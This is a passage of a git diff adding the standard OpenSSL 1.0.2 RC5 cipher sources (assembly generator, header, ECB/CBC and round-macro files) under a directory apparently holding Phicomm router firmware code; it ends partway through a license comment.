+sub RC5_32_encrypt
+	{
+	local($name,$enc)=@_;
+
+	&function_begin_B($name,"");
+
+	&comment("");
+
+	&push("ebp");
+	 &push("esi");
+	&push("edi");
+	 &mov($tmp4,&wparam(0));
+	&mov($S,&wparam(1));
+
+	&comment("Load the 2 words");
+	 &mov($A,&DWP(0,$tmp4,"",0));
+	&mov($B,&DWP(4,$tmp4,"",0));
+
+	&push($r);
+	 &mov($r,	&DWP(0,$S,"",0));
+
+	# encrypting part
+
+	if ($enc)
+		{
+		 &add($A,	&DWP(4+0,$S,"",0));
+		&add($B,	&DWP(4+4,$S,"",0));
+
+		for ($i=0; $i<$RC5_MAX_ROUNDS; $i++)
+			{
+			 &xor($A,	$B);
+			&mov($tmp1,	&DWP(12+$i*8,$S,"",0));
+			 &mov($tmpc,	$B);
+			&rotl($A,	&LB("ecx"));
+			&add($A,	$tmp1);
+
+			 &xor($B,	$A);
+			&mov($tmp1,	&DWP(16+$i*8,$S,"",0));
+			 &mov($tmpc,	$A);
+			&rotl($B,	&LB("ecx"));
+			&add($B,	$tmp1);
+			if (($i == 7) || ($i == 11))
+				{
+			 &cmp($r,	$i+1);
+			&je(&label("rc5_exit"));
+				}
+			}
+		}
+	else
+		{
+		 &cmp($r,	12);
+		&je(&label("rc5_dec_12"));
+		 &cmp($r,	8);
+		&je(&label("rc5_dec_8"));
+		for ($i=$RC5_MAX_ROUNDS; $i > 0; $i--)
+			{
+			&set_label("rc5_dec_$i") if ($i == 12) || ($i == 8);
+			 &mov($tmp1,	&DWP($i*8+8,$S,"",0));
+			&sub($B,	$tmp1);
+			 &mov($tmpc,	$A);
+			&rotr($B,	&LB("ecx"));
+			&xor($B,	$A);
+
+			 &mov($tmp1,	&DWP($i*8+4,$S,"",0));
+			&sub($A,	$tmp1);
+			 &mov($tmpc,	$B);
+			&rotr($A,	&LB("ecx"));
+			&xor($A,	$B);
+			}
+		 &sub($B,	&DWP(4+4,$S,"",0));
+		&sub($A,	&DWP(4+0,$S,"",0));
+		}
+
+	&set_label("rc5_exit");
+	 &mov(&DWP(0,$tmp4,"",0),$A);
+	&mov(&DWP(4,$tmp4,"",0),$B);
+
+	 &pop("ebx");
+	&pop("edi");
+	 &pop("esi");
+	&pop("ebp");
+	 &ret();
+	&function_end_B($name);
+	}
+
+
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/rc5/rc5.h b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/rc5/rc5.h
new file mode 100644
index 0000000..fba6137
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/rc5/rc5.h
@@ -0,0 +1,115 @@
+/* crypto/rc5/rc5.h */
+/* Copyright (C) 1995-1998 Eric Young (eay@cryptsoft.com)
+ * All rights reserved.
+ *
+ * This package is an SSL implementation written
+ * by Eric Young (eay@cryptsoft.com).
+ * The implementation was written so as to conform with Netscapes SSL.
+ *
+ * This library is free for commercial and non-commercial use as long as
+ * the following conditions are aheared to.  The following conditions
+ * apply to all code found in this distribution, be it the RC4, RSA,
+ * lhash, DES, etc., code; not just the SSL code.  The SSL documentation
+ * included with this distribution is covered by the same copyright terms
+ * except that the holder is Tim Hudson (tjh@cryptsoft.com).
+ *
+ * Copyright remains Eric Young's, and as such any Copyright notices in
+ * the code are not to be removed.
+ * If this package is used in a product, Eric Young should be given attribution
+ * as the author of the parts of the library used.
+ * This can be in the form of a textual message at program startup or
+ * in documentation (online or textual) provided with the package.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ * 1. Redistributions of source code must retain the copyright
+ *    notice, this list of conditions and the following disclaimer.
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in the
+ *    documentation and/or other materials provided with the distribution.
+ * 3. All advertising materials mentioning features or use of this software
+ *    must display the following acknowledgement:
+ *    "This product includes cryptographic software written by
+ *     Eric Young (eay@cryptsoft.com)"
+ *    The word 'cryptographic' can be left out if the rouines from the library
+ *    being used are not cryptographic related :-).
+ * 4. If you include any Windows specific code (or a derivative thereof) from
+ *    the apps directory (application code) you must include an acknowledgement:
+ *    "This product includes software written by Tim Hudson (tjh@cryptsoft.com)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY ERIC YOUNG ``AS IS'' AND
+ * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
+ * ARE DISCLAIMED.  IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
+ * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
+ * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
+ * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
+ * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
+ * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
+ * SUCH DAMAGE.
+ *
+ * The licence and distribution terms for any publically available version or
+ * derivative of this code cannot be changed.  i.e. this code cannot simply be
+ * copied and put under another distribution licence
+ * [including the GNU Public Licence.]
+ */
+
+#ifndef HEADER_RC5_H
+# define HEADER_RC5_H
+
+# include <openssl/opensslconf.h>/* OPENSSL_NO_RC5 */
+
+#ifdef  __cplusplus
+extern "C" {
+#endif
+
+# ifdef OPENSSL_NO_RC5
+#  error RC5 is disabled.
+# endif
+
+# define RC5_ENCRYPT     1
+# define RC5_DECRYPT     0
+
+/* 32 bit.  For Alpha, things may get weird */
+# define RC5_32_INT unsigned long
+
+# define RC5_32_BLOCK            8
+# define RC5_32_KEY_LENGTH       16/* This is a default, max is 255 */
+
+/*
+ * This are the only values supported.  Tweak the code if you want more The
+ * most supported modes will be RC5-32/12/16 RC5-32/16/8
+ */
+# define RC5_8_ROUNDS    8
+# define RC5_12_ROUNDS   12
+# define RC5_16_ROUNDS   16
+
+typedef struct rc5_key_st {
+    /* Number of rounds */
+    int rounds;
+    RC5_32_INT data[2 * (RC5_16_ROUNDS + 1)];
+} RC5_32_KEY;
+
+void RC5_32_set_key(RC5_32_KEY *key, int len, const unsigned char *data,
+                    int rounds);
+void RC5_32_ecb_encrypt(const unsigned char *in, unsigned char *out,
+                        RC5_32_KEY *key, int enc);
+void RC5_32_encrypt(unsigned long *data, RC5_32_KEY *key);
+void RC5_32_decrypt(unsigned long *data, RC5_32_KEY *key);
+void RC5_32_cbc_encrypt(const unsigned char *in, unsigned char *out,
+                        long length, RC5_32_KEY *ks, unsigned char *iv,
+                        int enc);
+void RC5_32_cfb64_encrypt(const unsigned char *in, unsigned char *out,
+                          long length, RC5_32_KEY *schedule,
+                          unsigned char *ivec, int *num, int enc);
+void RC5_32_ofb64_encrypt(const unsigned char *in, unsigned char *out,
+                          long length, RC5_32_KEY *schedule,
+                          unsigned char *ivec, int *num);
+
+#ifdef  __cplusplus
+}
+#endif
+
+#endif
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/rc5/rc5_ecb.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/rc5/rc5_ecb.c
new file mode 100644
index 0000000..e657a93
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/rc5/rc5_ecb.c
@@ -0,0 +1,83 @@
+/* crypto/rc5/rc5_ecb.c */
+/* Copyright (C) 1995-1998 Eric Young (eay@cryptsoft.com)
+ * All rights reserved.
+ *
+ * This package is an SSL implementation written
+ * by Eric Young (eay@cryptsoft.com).
+ * The implementation was written so as to conform with Netscapes SSL.
+ *
+ * This library is free for commercial and non-commercial use as long as
+ * the following conditions are aheared to.  The following conditions
+ * apply to all code found in this distribution, be it the RC4, RSA,
+ * lhash, DES, etc., code; not just the SSL code.  The SSL documentation
+ * included with this distribution is covered by the same copyright terms
+ * except that the holder is Tim Hudson (tjh@cryptsoft.com).
+ *
+ * Copyright remains Eric Young's, and as such any Copyright notices in
+ * the code are not to be removed.
+ * If this package is used in a product, Eric Young should be given attribution
+ * as the author of the parts of the library used.
+ * This can be in the form of a textual message at program startup or
+ * in documentation (online or textual) provided with the package.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ * 1. Redistributions of source code must retain the copyright
+ *    notice, this list of conditions and the following disclaimer.
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in the
+ *    documentation and/or other materials provided with the distribution.
+ * 3. All advertising materials mentioning features or use of this software
+ *    must display the following acknowledgement:
+ *    "This product includes cryptographic software written by
+ *     Eric Young (eay@cryptsoft.com)"
+ *    The word 'cryptographic' can be left out if the rouines from the library
+ *    being used are not cryptographic related :-).
+ * 4. If you include any Windows specific code (or a derivative thereof) from
+ *    the apps directory (application code) you must include an acknowledgement:
+ *    "This product includes software written by Tim Hudson (tjh@cryptsoft.com)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY ERIC YOUNG ``AS IS'' AND
+ * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
+ * ARE DISCLAIMED.  IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
+ * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
+ * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
+ * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
+ * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
+ * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
+ * SUCH DAMAGE.
+ *
+ * The licence and distribution terms for any publically available version or
+ * derivative of this code cannot be changed.  i.e. this code cannot simply be
+ * copied and put under another distribution licence
+ * [including the GNU Public Licence.]
+ */
+
+#include <openssl/rc5.h>
+#include "rc5_locl.h"
+#include <openssl/opensslv.h>
+
+const char RC5_version[] = "RC5" OPENSSL_VERSION_PTEXT;
+
+void RC5_32_ecb_encrypt(const unsigned char *in, unsigned char *out,
+                        RC5_32_KEY *ks, int encrypt)
+{
+    unsigned long l, d[2];
+
+    c2l(in, l);
+    d[0] = l;
+    c2l(in, l);
+    d[1] = l;
+    if (encrypt)
+        RC5_32_encrypt(d, ks);
+    else
+        RC5_32_decrypt(d, ks);
+    l = d[0];
+    l2c(l, out);
+    l = d[1];
+    l2c(l, out);
+    l = d[0] = d[1] = 0;
+}
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/rc5/rc5_enc.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/rc5/rc5_enc.c
new file mode 100644
index 0000000..06b89d8
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/rc5/rc5_enc.c
@@ -0,0 +1,209 @@
+/* crypto/rc5/rc5_enc.c */
+/* Copyright (C) 1995-1998 Eric Young (eay@cryptsoft.com)
+ * All rights reserved.
+ *
+ * This package is an SSL implementation written
+ * by Eric Young (eay@cryptsoft.com).
+ * The implementation was written so as to conform with Netscapes SSL.
+ *
+ * This library is free for commercial and non-commercial use as long as
+ * the following conditions are aheared to.  The following conditions
+ * apply to all code found in this distribution, be it the RC4, RSA,
+ * lhash, DES, etc., code; not just the SSL code.  The SSL documentation
+ * included with this distribution is covered by the same copyright terms
+ * except that the holder is Tim Hudson (tjh@cryptsoft.com).
+ *
+ * Copyright remains Eric Young's, and as such any Copyright notices in
+ * the code are not to be removed.
+ * If this package is used in a product, Eric Young should be given attribution
+ * as the author of the parts of the library used.
+ * This can be in the form of a textual message at program startup or
+ * in documentation (online or textual) provided with the package.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ * 1. Redistributions of source code must retain the copyright
+ *    notice, this list of conditions and the following disclaimer.
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in the
+ *    documentation and/or other materials provided with the distribution.
+ * 3. All advertising materials mentioning features or use of this software
+ *    must display the following acknowledgement:
+ *    "This product includes cryptographic software written by
+ *     Eric Young (eay@cryptsoft.com)"
+ *    The word 'cryptographic' can be left out if the rouines from the library
+ *    being used are not cryptographic related :-).
+ * 4. If you include any Windows specific code (or a derivative thereof) from
+ *    the apps directory (application code) you must include an acknowledgement:
+ *    "This product includes software written by Tim Hudson (tjh@cryptsoft.com)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY ERIC YOUNG ``AS IS'' AND
+ * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
+ * ARE DISCLAIMED.  IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
+ * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
+ * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
+ * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
+ * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
+ * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
+ * SUCH DAMAGE.
+ *
+ * The licence and distribution terms for any publically available version or
+ * derivative of this code cannot be changed.  i.e. this code cannot simply be
+ * copied and put under another distribution licence
+ * [including the GNU Public Licence.]
+ */
+
+#include <stdio.h>
+#include <openssl/rc5.h>
+#include "rc5_locl.h"
+
+void RC5_32_cbc_encrypt(const unsigned char *in, unsigned char *out,
+                        long length, RC5_32_KEY *ks, unsigned char *iv,
+                        int encrypt)
+{
+    register unsigned long tin0, tin1;
+    register unsigned long tout0, tout1, xor0, xor1;
+    register long l = length;
+    unsigned long tin[2];
+
+    if (encrypt) {
+        c2l(iv, tout0);
+        c2l(iv, tout1);
+        iv -= 8;
+        for (l -= 8; l >= 0; l -= 8) {
+            c2l(in, tin0);
+            c2l(in, tin1);
+            tin0 ^= tout0;
+            tin1 ^= tout1;
+            tin[0] = tin0;
+            tin[1] = tin1;
+            RC5_32_encrypt(tin, ks);
+            tout0 = tin[0];
+            l2c(tout0, out);
+            tout1 = tin[1];
+            l2c(tout1, out);
+        }
+        if (l != -8) {
+            c2ln(in, tin0, tin1, l + 8);
+            tin0 ^= tout0;
+            tin1 ^= tout1;
+            tin[0] = tin0;
+            tin[1] = tin1;
+            RC5_32_encrypt(tin, ks);
+            tout0 = tin[0];
+            l2c(tout0, out);
+            tout1 = tin[1];
+            l2c(tout1, out);
+        }
+        l2c(tout0, iv);
+        l2c(tout1, iv);
+    } else {
+        c2l(iv, xor0);
+        c2l(iv, xor1);
+        iv -= 8;
+        for (l -= 8; l >= 0; l -= 8) {
+            c2l(in, tin0);
+            tin[0] = tin0;
+            c2l(in, tin1);
+            tin[1] = tin1;
+            RC5_32_decrypt(tin, ks);
+            tout0 = tin[0] ^ xor0;
+            tout1 = tin[1] ^ xor1;
+            l2c(tout0, out);
+            l2c(tout1, out);
+            xor0 = tin0;
+            xor1 = tin1;
+        }
+        if (l != -8) {
+            c2l(in, tin0);
+            tin[0] = tin0;
+            c2l(in, tin1);
+            tin[1] = tin1;
+            RC5_32_decrypt(tin, ks);
+            tout0 = tin[0] ^ xor0;
+            tout1 = tin[1] ^ xor1;
+            l2cn(tout0, tout1, out, l + 8);
+            xor0 = tin0;
+            xor1 = tin1;
+        }
+        l2c(xor0, iv);
+        l2c(xor1, iv);
+    }
+    tin0 = tin1 = tout0 = tout1 = xor0 = xor1 = 0;
+    tin[0] = tin[1] = 0;
+}
+
+void RC5_32_encrypt(unsigned long *d, RC5_32_KEY *key)
+{
+    RC5_32_INT a, b, *s;
+
+    s = key->data;
+
+    a = d[0] + s[0];
+    b = d[1] + s[1];
+    E_RC5_32(a, b, s, 2);
+    E_RC5_32(a, b, s, 4);
+    E_RC5_32(a, b, s, 6);
+    E_RC5_32(a, b, s, 8);
+    E_RC5_32(a, b, s, 10);
+    E_RC5_32(a, b, s, 12);
+    E_RC5_32(a, b, s, 14);
+    E_RC5_32(a, b, s, 16);
+    if (key->rounds == 12) {
+        E_RC5_32(a, b, s, 18);
+        E_RC5_32(a, b, s, 20);
+        E_RC5_32(a, b, s, 22);
+        E_RC5_32(a, b, s, 24);
+    } else if (key->rounds == 16) {
+        /* Do a full expansion to avoid a jump */
+        E_RC5_32(a, b, s, 18);
+        E_RC5_32(a, b, s, 20);
+        E_RC5_32(a, b, s, 22);
+        E_RC5_32(a, b, s, 24);
+        E_RC5_32(a, b, s, 26);
+        E_RC5_32(a, b, s, 28);
+        E_RC5_32(a, b, s, 30);
+        E_RC5_32(a, b, s, 32);
+    }
+    d[0] = a;
+    d[1] = b;
+}
+
+void RC5_32_decrypt(unsigned long *d, RC5_32_KEY *key)
+{
+    RC5_32_INT a, b, *s;
+
+    s = key->data;
+
+    a = d[0];
+    b = d[1];
+    if (key->rounds == 16) {
+        D_RC5_32(a, b, s, 32);
+        D_RC5_32(a, b, s, 30);
+        D_RC5_32(a, b, s, 28);
+        D_RC5_32(a, b, s, 26);
+        /* Do a full expansion to avoid a jump */
+        D_RC5_32(a, b, s, 24);
+        D_RC5_32(a, b, s, 22);
+        D_RC5_32(a, b, s, 20);
+        D_RC5_32(a, b, s, 18);
+    } else if (key->rounds == 12) {
+        D_RC5_32(a, b, s, 24);
+        D_RC5_32(a, b, s, 22);
+        D_RC5_32(a, b, s, 20);
+        D_RC5_32(a, b, s, 18);
+    }
+    D_RC5_32(a, b, s, 16);
+    D_RC5_32(a, b, s, 14);
+    D_RC5_32(a, b, s, 12);
+    D_RC5_32(a, b, s, 10);
+    D_RC5_32(a, b, s, 8);
+    D_RC5_32(a, b, s, 6);
+    D_RC5_32(a, b, s, 4);
+    D_RC5_32(a, b, s, 2);
+    d[0] = a - s[0];
+    d[1] = b - s[1];
+}
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/rc5/rc5_locl.h b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/rc5/rc5_locl.h
new file mode 100644
index 0000000..ee757e6
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/rc5/rc5_locl.h
@@ -0,0 +1,207 @@
+/* crypto/rc5/rc5_locl.h */
+/* Copyright (C) 1995-1998 Eric Young (eay@cryptsoft.com)
+ * All rights reserved.
+ *
+ * This package is an SSL implementation written
+ * by Eric Young (eay@cryptsoft.com).
+ * The implementation was written so as to conform with Netscapes SSL.
+ *
+ * This library is free for commercial and non-commercial use as long as
+ * the following conditions are aheared to.  The following conditions
+ * apply to all code found in this distribution, be it the RC4, RSA,
+ * lhash, DES, etc., code; not just the SSL code.  The SSL documentation
+ * included with this distribution is covered by the same copyright terms
+ * except that the holder is Tim Hudson (tjh@cryptsoft.com).
+ *
+ * Copyright remains Eric Young's, and as such any Copyright notices in
+ * the code are not to be removed.
+ * If this package is used in a product, Eric Young should be given attribution
+ * as the author of the parts of the library used.
+ * This can be in the form of a textual message at program startup or
+ * in documentation (online or textual) provided with the package.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ * 1. Redistributions of source code must retain the copyright
+ *    notice, this list of conditions and the following disclaimer.
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in the
+ *    documentation and/or other materials provided with the distribution.
+ * 3. All advertising materials mentioning features or use of this software
+ *    must display the following acknowledgement:
+ *    "This product includes cryptographic software written by
+ *     Eric Young (eay@cryptsoft.com)"
+ *    The word 'cryptographic' can be left out if the rouines from the library
+ *    being used are not cryptographic related :-).
+ * 4. If you include any Windows specific code (or a derivative thereof) from
+ *    the apps directory (application code) you must include an acknowledgement:
+ *    "This product includes software written by Tim Hudson (tjh@cryptsoft.com)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY ERIC YOUNG ``AS IS'' AND
+ * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
+ * ARE DISCLAIMED.  IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
+ * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
+ * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
+ * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
+ * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
+ * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
+ * SUCH DAMAGE.
+ *
+ * The licence and distribution terms for any publically available version or
+ * derivative of this code cannot be changed.  i.e. this code cannot simply be
+ * copied and put under another distribution licence
+ * [including the GNU Public Licence.]
+ */
+
+#include <stdlib.h>
+
+#undef c2l
+#define c2l(c,l)        (l =((unsigned long)(*((c)++)))    , \
+                         l|=((unsigned long)(*((c)++)))<< 8L, \
+                         l|=((unsigned long)(*((c)++)))<<16L, \
+                         l|=((unsigned long)(*((c)++)))<<24L)
+
+/* NOTE - c is not incremented as per c2l */
+#undef c2ln
+#define c2ln(c,l1,l2,n) { \
+                        c+=n; \
+                        l1=l2=0; \
+                        switch (n) { \
+                        case 8: l2 =((unsigned long)(*(--(c))))<<24L; \
+                        case 7: l2|=((unsigned long)(*(--(c))))<<16L; \
+                        case 6: l2|=((unsigned long)(*(--(c))))<< 8L; \
+                        case 5: l2|=((unsigned long)(*(--(c))));     \
+                        case 4: l1 =((unsigned long)(*(--(c))))<<24L; \
+                        case 3: l1|=((unsigned long)(*(--(c))))<<16L; \
+                        case 2: l1|=((unsigned long)(*(--(c))))<< 8L; \
+                        case 1: l1|=((unsigned long)(*(--(c))));     \
+                                } \
+                        }
+
+#undef l2c
+#define l2c(l,c)        (*((c)++)=(unsigned char)(((l)     )&0xff), \
+                         *((c)++)=(unsigned char)(((l)>> 8L)&0xff), \
+                         *((c)++)=(unsigned char)(((l)>>16L)&0xff), \
+                         *((c)++)=(unsigned char)(((l)>>24L)&0xff))
+
+/* NOTE - c is not incremented as per l2c */
+#undef l2cn
+#define l2cn(l1,l2,c,n) { \
+                        c+=n; \
+                        switch (n) { \
+                        case 8: *(--(c))=(unsigned char)(((l2)>>24L)&0xff); \
+                        case 7: *(--(c))=(unsigned char)(((l2)>>16L)&0xff); \
+                        case 6: *(--(c))=(unsigned char)(((l2)>> 8L)&0xff); \
+                        case 5: *(--(c))=(unsigned char)(((l2)     )&0xff); \
+                        case 4: *(--(c))=(unsigned char)(((l1)>>24L)&0xff); \
+                        case 3: *(--(c))=(unsigned char)(((l1)>>16L)&0xff); \
+                        case 2: *(--(c))=(unsigned char)(((l1)>> 8L)&0xff); \
+                        case 1: *(--(c))=(unsigned char)(((l1)     )&0xff); \
+                                } \
+                        }
+
+/* NOTE - c is not incremented as per n2l */
+#define n2ln(c,l1,l2,n) { \
+                        c+=n; \
+                        l1=l2=0; \
+                        switch (n) { \
+                        case 8: l2 =((unsigned long)(*(--(c))))    ; \
+                        case 7: l2|=((unsigned long)(*(--(c))))<< 8; \
+                        case 6: l2|=((unsigned long)(*(--(c))))<<16; \
+                        case 5: l2|=((unsigned long)(*(--(c))))<<24; \
+                        case 4: l1 =((unsigned long)(*(--(c))))    ; \
+                        case 3: l1|=((unsigned long)(*(--(c))))<< 8; \
+                        case 2: l1|=((unsigned long)(*(--(c))))<<16; \
+                        case 1: l1|=((unsigned long)(*(--(c))))<<24; \
+                                } \
+                        }
+
+/* NOTE - c is not incremented as per l2n */
+#define l2nn(l1,l2,c,n) { \
+                        c+=n; \
+                        switch (n) { \
+                        case 8: *(--(c))=(unsigned char)(((l2)    )&0xff); \
+                        case 7: *(--(c))=(unsigned char)(((l2)>> 8)&0xff); \
+                        case 6: *(--(c))=(unsigned char)(((l2)>>16)&0xff); \
+                        case 5: *(--(c))=(unsigned char)(((l2)>>24)&0xff); \
+                        case 4: *(--(c))=(unsigned char)(((l1)    )&0xff); \
+                        case 3: *(--(c))=(unsigned char)(((l1)>> 8)&0xff); \
+                        case 2: *(--(c))=(unsigned char)(((l1)>>16)&0xff); \
+                        case 1: *(--(c))=(unsigned char)(((l1)>>24)&0xff); \
+                                } \
+                        }
+
+#undef n2l
+#define n2l(c,l)        (l =((unsigned long)(*((c)++)))<<24L, \
+                         l|=((unsigned long)(*((c)++)))<<16L, \
+                         l|=((unsigned long)(*((c)++)))<< 8L, \
+                         l|=((unsigned long)(*((c)++))))
+
+#undef l2n
+#define l2n(l,c)        (*((c)++)=(unsigned char)(((l)>>24L)&0xff), \
+                         *((c)++)=(unsigned char)(((l)>>16L)&0xff), \
+                         *((c)++)=(unsigned char)(((l)>> 8L)&0xff), \
+                         *((c)++)=(unsigned char)(((l)     )&0xff))
+
+#if (defined(OPENSSL_SYS_WIN32) && defined(_MSC_VER))
+# define ROTATE_l32(a,n)     _lrotl(a,n)
+# define ROTATE_r32(a,n)     _lrotr(a,n)
+#elif defined(__ICC)
+# define ROTATE_l32(a,n)     _rotl(a,n)
+# define ROTATE_r32(a,n)     _rotr(a,n)
+#elif defined(__GNUC__) && __GNUC__>=2 && !defined(__STRICT_ANSI__) && !defined(OPENSSL_NO_ASM) && !defined(OPENSSL_NO_INLINE_ASM) && !defined(PEDANTIC)
+# if defined(__i386) || defined(__i386__) || defined(__x86_64) || defined(__x86_64__)
+#  define ROTATE_l32(a,n)       ({ register unsigned int ret;   \
+                                        asm ("roll %%cl,%0"     \
+                                                : "=r"(ret)     \
+                                                : "c"(n),"0"((unsigned int)(a)) \
+                                                : "cc");        \
+                                        ret;                    \
+                                })
+#  define ROTATE_r32(a,n)       ({ register unsigned int ret;   \
+                                        asm ("rorl %%cl,%0"     \
+                                                : "=r"(ret)     \
+                                                : "c"(n),"0"((unsigned int)(a)) \
+                                                : "cc");        \
+                                        ret;                    \
+                                })
+# endif
+#endif
+#ifndef ROTATE_l32
+# define ROTATE_l32(a,n)     (((a)<<(n&0x1f))|(((a)&0xffffffff)>>(32-(n&0x1f))))
+#endif
+#ifndef ROTATE_r32
+# define ROTATE_r32(a,n)     (((a)<<(32-(n&0x1f)))|(((a)&0xffffffff)>>(n&0x1f)))
+#endif
+
+#define RC5_32_MASK     0xffffffffL
+
+#define RC5_16_P        0xB7E1
+#define RC5_16_Q        0x9E37
+#define RC5_32_P        0xB7E15163L
+#define RC5_32_Q        0x9E3779B9L
+#define RC5_64_P        0xB7E151628AED2A6BLL
+#define RC5_64_Q        0x9E3779B97F4A7C15LL
+
+#define E_RC5_32(a,b,s,n) \
+        a^=b; \
+        a=ROTATE_l32(a,b); \
+        a+=s[n]; \
+        a&=RC5_32_MASK; \
+        b^=a; \
+        b=ROTATE_l32(b,a); \
+        b+=s[n+1]; \
+        b&=RC5_32_MASK;
+
+#define D_RC5_32(a,b,s,n) \
+        b-=s[n+1]; \
+        b&=RC5_32_MASK; \
+        b=ROTATE_r32(b,a); \
+        b^=a; \
+        a-=s[n]; \
+        a&=RC5_32_MASK; \
+        a=ROTATE_r32(a,b); \
+        a^=b;
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/rc5/rc5_skey.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/rc5/rc5_skey.c
new file mode 100644
index 0000000..5dd4a52
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/rc5/rc5_skey.c
@@ -0,0 +1,110 @@
+/* crypto/rc5/rc5_skey.c */
+/* Copyright (C) 1995-1998 Eric Young (eay@cryptsoft.com)
+ * All rights reserved.
+ *
+ * This package is an SSL implementation written
+ * by Eric Young (eay@cryptsoft.com).
+ * The implementation was written so as to conform with Netscapes SSL.
+ *
+ * This library is free for commercial and non-commercial use as long as
+ * the following conditions are aheared to.  The following conditions
+ * apply to all code found in this distribution, be it the RC4, RSA,
+ * lhash, DES, etc., code; not just the SSL code.  The SSL documentation
+ * included with this distribution is covered by the same copyright terms
+ * except that the holder is Tim Hudson (tjh@cryptsoft.com).
+ *
+ * Copyright remains Eric Young's, and as such any Copyright notices in
+ * the code are not to be removed.
+ * If this package is used in a product, Eric Young should be given attribution
+ * as the author of the parts of the library used.
